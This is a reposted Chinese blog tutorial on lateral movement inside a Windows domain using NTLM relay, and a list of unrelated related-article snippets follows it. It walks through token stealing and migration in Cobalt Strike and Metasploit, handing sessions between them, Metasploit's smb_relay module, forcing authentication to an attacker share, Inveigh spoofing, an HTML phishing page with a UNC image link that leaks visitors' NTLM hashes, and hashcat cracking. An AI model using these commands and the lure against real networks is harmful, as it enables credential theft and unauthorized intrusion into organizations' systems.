内网横向移动—NTLM-Relay重放Responder中继攻击LdapEws

news2024/11/16 9:57:54

内网横向移动—NTLM-Relay重放&Responder中继攻击&Ldap&Ews

  • 1. 前置了解
    • 1.1. MSF与CS切换权限
      • 1.1.1. CS会话中切换权限
        • 1.1.1.1. 查看进程
        • 1.1.1.2. 权限权限
      • 1.1.2. MSF会话中切换权限
  • 2. NTLM中继攻击—Relay重放—SMB上线
    • 2.1. 案例测试
      • 2.1.1. 同账户密码测试
      • 2.1.2. 不同账户同密码测试
    • 2.2. CS联动MSF测试
      • 2.2.1. CS转发MSF上线
        • 2.2.1.1. 案例操作
        • 2.2.1.2. 添加路由
      • 2.2.2. 重放模块攻击
        • 2.2.2.1. 模块设置
        • 2.2.2.2. 访问设置
  • 3. NTLM中继攻击-Inveigh嗅探-Hash破解
    • 3.1. 开启监听
    • 3.2. 开始拦截
    • 3.3. 钓鱼页面
    • 3.4. 破解密文

1. 前置了解

  与NLTM认证相关的安全问题主要有Pass The Hash、利用NTLM进行信息收集、Net-NTLM Hash破解、NTLM Relay几种。PTH前往期文章复现,运用mimikatz、impacket工具包的一些脚本、CS等等都可以利用,NTLM Relay又包括(relay to smb,ldap,ews)
  可以应用在获取不到明文或HASH时采用的手法,但也要注意手法的必备条件。

1.1. MSF与CS切换权限

  在正常CS或者MSF上线的时候,我们的目标通常是普通用户上线,如何提权到system权限,但是有时候需要使用到administrator,就会导致我们没有会话去连接,那么这里就是介绍一下,如何切换会话中的权限,同时要注意的是,低权限会话是无法切换至高权限的,但是高权限能够切换至低权限,相当于system权限能够切换到administrator,但是webadmin权限是无法切换至administrator权限的,这个是需要注意的。

  简单来说,我们需要获取到最高权限才能降权限。

1.1.1. CS会话中切换权限

  首先利用CS会话中高权限去查看进程,观察进程中有哪些是administrator权限再运行的,然后记录这个进程的PID值,其次切换PID值即可。

1.1.1.1. 查看进程

  这里我先提前给各位看了一下,我的现在的权限是system权限,然后使用ps查看了一下哪些是administrator权限再运行的,这里我看到一个PID号位2336的。

ps  ##查看运行进程

在这里插入图片描述

1.1.1.2. 权限权限

  这里可以看到我成功切换了权限。

steal_token 2336   ##切换权限  2336 是PID进程号

在这里插入图片描述

1.1.2. MSF会话中切换权限

  这里我就不说进程了,是一样的操作,都是查进程记PID,然后切换,只是切换命令有点不同。

migrate 1992   #1992是PID号

在这里插入图片描述

2. NTLM中继攻击—Relay重放—SMB上线

  在使用Relay重放的时候需要有一个前置条件,这个条件就是需要通讯的双方账户与密码是一致的,例如:Windows server 2012 DC中有administrator/admin@123,同时Windows server 2008 域内主机虽然登陆的是0day/webadmin,但是还是如果其中的administrator账户的与密码和DC是一样的,那么就可以进行访问,因为访问的时候默认是使用当前的账户密码去与对方的账户密码进行校验。

2.1. 案例测试

  这里我们对DC进行测试一下,案例配置如下:

域控DC:192.168.3.142  administrator/admin@123
域内主机:192.168.3.10  administrator/admin@123
											 webadmin/admin@123

  从上述也能够看出,密码都是一样的,只有账户存在不同,下面就来进行测试,看看是否验证了之前的说法。

2.1.1. 同账户密码测试

  我将域内主机也切换到administrator,来进行测试,按照这个条件,那么此时的域控DC与域内主机是相同账户密码,可以看到直接就能够访问,并未出现什么报错。

在这里插入图片描述

2.1.2. 不同账户同密码测试

  我将域内主机切换到webadmin,来进行测试,按照条件,目前是不同的账户,但是密码是相同的,可以看到这里直接就是拒绝访问,当然这里应该是账户密码错误的,这里拒绝访问应该是域控设置权限的问题。

在这里插入图片描述

2.2. CS联动MSF测试

  先让域内主机上线CS,由于CS中没有相应的功能,需要使用联动MSF进行测试,同时这里要把传输过来的会话提权到systeam进行执行。

  至于CS的上线操作这里就不多说了。

2.2.1. CS转发MSF上线

  在上篇文章中已经介绍CS转发MSF上线了,这里就不提了,直接看操作,也不介绍了。

2.2.1.1. 案例操作

  注意这里一定要先run,然后CS再进行操作,不然容易监听不起来。

CS:新建会话,会话选择监听的那个MSF,也可以使用命令:spawn msf
MSF:设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 3010
run

在这里插入图片描述

2.2.1.2. 添加路由

  由于域控是在内网中,所以需要给会话添加一个相应的路由,这样MSF就能够连接域内主机。

run autoroute -p ##查看当前路由表
run post/multi/manage/autoroute ##添加当前路由表
backgroup ##返回

在这里插入图片描述

2.2.2. 重放模块攻击

  这里就需要使用到SMB重放模块进行攻击,这里看完下面的操作,再看图就能看懂了,同样前提条件就是账号密码相同,才能利用成功,如果不同就无法利用。

在这里插入图片描述

2.2.2.1. 模块设置

  这里我就直接说了并未成功,只返回了hash值,但是会话并未建立起来,我查询了一下,确实网上很多文章都未成功,不过也有说64位系统未成功,但是32位系统成功了,这…所以我也不想切换32位系统进行测试了,如果只有32位系统能够成功,那真的就太鸡肋了,同时还有一种情况,目前更新的msf都是新的,会不会是msf模块中的一个小bug问题,所导致的。

use exploit/windows/smb/smb_relay
set smbhost 192.168.3.142   #攻击目标
set lhost 192.168.10.20   #设置本地 IP
set autorunscript post/windows/manage/migrate
set payload windows/meterpreter/bind_tcp  ##设置正向连接
set rhost 192.168.3.142 #设置连接目标
run

在这里插入图片描述

2.2.2.2. 访问设置

  这里需要在被控主机上访问攻击主机地址,简单来说,就是被控主机去访问攻击机,将自生的账户密码相当于发送给攻击机,让攻击机获取到账号密码再去访问域控,实现攻击机中继拦截上线。

  同时需要注意要使用administrator权限去操作。

dir \\192.168.10.20\c$

在这里插入图片描述

3. NTLM中继攻击-Inveigh嗅探-Hash破解

  这个攻击手段就是攻击者在被控主机上伪造一个SMB服务器,当内网中有机器对被控主机进行SMB访问的时候,内网中的主机先访问攻击者伪造的SMB服务器,然后伪造的SMB服务器再将访问流量重放给被控主机,在这个过程中,内网主机是毫无感觉的,但是内网主机访问的用户的账号与密码的hash值均被伪造的SMB服务器获取。

  Inveigh嗅探

  hash破解

  这里由于我的虚拟机中都不止.net3.5,而且不知道为什么无法安装,也挺麻烦的,所以直接借鉴别人的加口述的,主要是操作很简单,不复杂,所以就懒得弄了。

3.1. 开启监听

  这里不建议将这个监听,放在本地去监听,容易出现问题,由于工具并不是很大,可以将工具上传至被控服务器上,实际情况中如果被杀,那么就只能本地监听了。

  这里还需要注意的是开启监听,一定要是内网主机都会访问这个主机,例如:开启监控的主机是域控,那你域内主机不访问域控的SMB那么就监听不到。

Inveigh.exe

在这里插入图片描述

3.2. 开始拦截

  这里也是,你访问的一定要是那个被监听的域内主机,不然无法获取到。

dir \\192.168.3.x\c$

在这里插入图片描述

3.3. 钓鱼页面

  这里可能会存在一个问题就是,我平时就不访问域控主机,而且谁闲着没事,使用dir去访问啊,而且域内使用者,都是办公人员,也不会这些操作,所以就需要设置一个钓鱼页面,挂载在内部的web解密中,或者你主动发送给域内主机。

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.3.32\2">
</body>
</html>

3.4. 破解密文

  但是这里有问题哦,如果虚拟机配置不够是会出现报错的,这个破解可能是需要进行加密计算的,然后比对,所以配置低,可能无法运行那么打的并发吧。看配置是需要4h4g…

hashcat -m 5600 hash1 pass2.txt  --show

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/810594.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

如何使用CRM系统进行客户关系维护管理?

企业要想持续的发展&#xff0c;就必须管理和维护与客户的关系。但如今客户需求更加复杂和多样化&#xff0c;维护客户关系的难度越来越大。许多企业使用CRM系统来帮助自己管理客户关系。通过本文&#xff0c;让您客户关系维护管理全知道。 1、客户画像 CRM系统可以帮助企业建…

【【萌新的stm32学习-1】】

萌新的stm32学习 冯诺依曼结构 采用了分时复用的结构 优点&#xff1a;总线资源占用少 缺点&#xff1a;执行效率低 哈佛结构 执行效率高 总线资源占用多 RISC 这是精简指令集的意思 arm公司 ARMv9是2021年发布的最新 Cortex-A 最好高性能 Cortex-R 中 Cortex-M 低 何为STM…

VScode的简单使用

一、VScode的安装 Visual Studio Code简称VS Code&#xff0c;是一款跨平台的、免费且开源的现代轻量级代码编辑器&#xff0c;支持几乎主流开发语言的语法高亮、智能代码补全、自定义快捷键、括号匹配和颜色区分、代码片段提示、代码对比等特性&#xff0c;也拥有对git的开箱…

Flutter - 微信朋友圈、十字滑动效果(微博/抖音个人中心效果)

demo 地址: https://github.com/iotjin/jh_flutter_demo 代码不定时更新&#xff0c;请前往github查看最新代码 前言 一般APP都有类似微博/抖音个人中心的效果&#xff0c;支持上下拉刷新&#xff0c;并且顶部有个图片可以下拉放大&#xff0c;图片底部是几个tab&#xff0c;可…

使用Docker部署EMQX

原文链接&#xff1a;http://www.ibearzmblog.com/#/technology/info?id9dd5bf4159d07f6a4e69a6b379ce4244 前言 在物联网中&#xff0c;大多通信协议使用的都是MQTT&#xff0c;而EMQX是基于 Erlang/OTP 平台开发的 MQTT 消息服务器&#xff0c;它的优点很多&#xff0c;我…

C语言第十二课---------操作符的介绍与使用(下)

作者前言 &#x1f382; ✨✨✨✨✨✨&#x1f367;&#x1f367;&#x1f367;&#x1f367;&#x1f367;&#x1f367;&#x1f367;&#x1f382; &#x1f382; 作者介绍&#xff1a; &#x1f382;&#x1f382; &#x1f382;…

第一章操作系统概述

0.定义 操作系统(Operating System&#xff0c;OS)是指控制和管理整个计算机系统的硬件和软件资源&#xff0c;并合理地组织调度计算机的工作和资源的分配;以提供给用户和其他软件方便的接口和环境;它是计算机系统中最基本的系统软件。 操作系统是系统资源的管理者向上层提供方…

C语言:通讯录(文件操作+动态内存管理) 简易版

目录 前言 一&#xff0c;通讯录菜单 二&#xff0c;通讯录菜单主函数 1.使用枚举&#xff1a; 2.主函数&#xff1a; 三&#xff0c;通讯录功能实现 1.创建通讯录 2.初始化通讯录 3&#xff0c;添加联系人 4&#xff0c;删除联系人 5&#xff0c;搜索联系人 6&…

SpringBoot面试题及答案整理

1、什么是 Spring Boot&#xff1f; 多年来&#xff0c;随着新功能的增加&#xff0c;spring 变得越来越复杂。访问spring官网页面&#xff0c;我们就会看到可以在我们的应用程序中使用的所有 Spring 项目的不同功能。如果必须启动一个新的 Spring 项目&#xff0c;我们必须添…

【MTI 6.S081 Lab】Page tables

【MTI 6.S081 Lab】Page tables Speed up system calls (easy)实验任务Hints哪些其它的系统调用能通过这个共享页面变得更快&#xff0c;请解释。解决方案分配和释放页面初始化结构 实验心得 Print a page table (easy)实验任务Hints根据图3-4从文本中解释vmprint的输出。第0页…

机器学习:自动编码器Auto-encoder

Self-supervised Learning Framework 不用标注数据就能学习的任务&#xff0c;比如Bert之类的。但最早的方法是Auto-encoder。 Outline Auto-encoder encoder输出的向量&#xff0c;被decoder还原的图片&#xff0c;让输出的图片与输入的图片越接近越好。 将原始的高维向量变…

红黑树解密:为什么根节点必须是黑色,两个红色节点不能挨着?

红黑树解密&#xff1a;为什么根节点必须是黑色&#xff0c;两个红色节点不能挨着&#xff1f; 博主简介一、引言1.1、红黑树是什么及其特点1.2、根节点为黑色和红色节点不连续的性质介绍 二、为何根节点必须是黑色&#xff1f;三、为何两个红色节点不能挨着&#xff1f;总结 博…

PCB绘制时踩的坑 - SOT-223封装

SOT-223封装并不是同一的&#xff0c;细分的话可以分为两种常用的封装。尤其是tab脚的属性很容易搞错。如果你想着用tab脚连接有属性的铺铜&#xff0c;来提高散热效率&#xff0c;那么你一定要注意你购买的器件tab脚的属性。 第一种如下图&#xff0c;第1脚为GND&#xff0c;第…

Packet Tracer - 备份配置文件

Packet Tracer - 备份配置文件 目标 第 1 部分&#xff1a;与 TFTP 服务器建立连接 第 2 部分&#xff1a;从 TFTP 服务器传输配置 第 3 部分&#xff1a;将配置和 IOS 备份到 TFTP 服务器上 拓扑图 背景/场景 本练习旨在展示如何从备份恢复配置&#xff0c;然后执行新的…

Stephen Wolfram:神经网络

Neural Nets 神经网络 OK, so how do our typical models for tasks like image recognition actually work? The most popular—and successful—current approach uses neural nets. Invented—in a form remarkably close to their use today—in the 1940s, neural nets …

如何查找网页的cookie【以两步路平台】

登录/注册账号【重要】 进入开发人员工具 刷新页面&#xff0c;发现“全部”对应的列表发生改变 找到列表首页的文本后缀.htm的信息&#xff0c;点开后查找网站的Cookie。 注意&#xff1a;Cookie必须在登陆后的才有效&#xff0c;并且每次爬取都需要重新查找更新Cookie&…

六、初始化和清理(1)

本章概要 利用构造器保证初始化方法重载 区分重载方法重载与基本类型返回值的重载无参构造器 this 关键字在构造器中调用构造器static 的含义 利用构造器保证初始化 "不安全"的编程是造成编程代价昂贵的罪魁祸首之一。有两个安全性问题&#xff1a;初始化和清理。…

redis和数据库双写不一致一般如何解决-面试

先介绍一下常规的几种做法 1、先删缓存&#xff0c;在改数据库 2、先改数据库&#xff0c;在删缓存 3、先改数据库&#xff0c;在改缓存 4、延迟双删&#xff08;先删缓存&#xff0c;再改数据库&#xff0c;延迟几百毫秒&#xff0c;再删缓存&#xff09;&#xff0c;此方…

通过gre隧道建立私有专用网络

Internet 配置 vlan 128 vlan 202 router1&#xff1a; router2&#xff1a; router1 ping router 2

一起学SF框架系列5.11-spring-beans-数据校验validation

在日常的项目开发中&#xff0c;应用在执行业务逻辑之前&#xff0c;为了防止非法参数对业务造成的影响&#xff0c;必须通过校验保证传入数据是合法正确的&#xff0c;但很多时候同样的校验出现了多次&#xff0c;在不同的层&#xff0c;不同的方法上&#xff0c;导致代码冗余…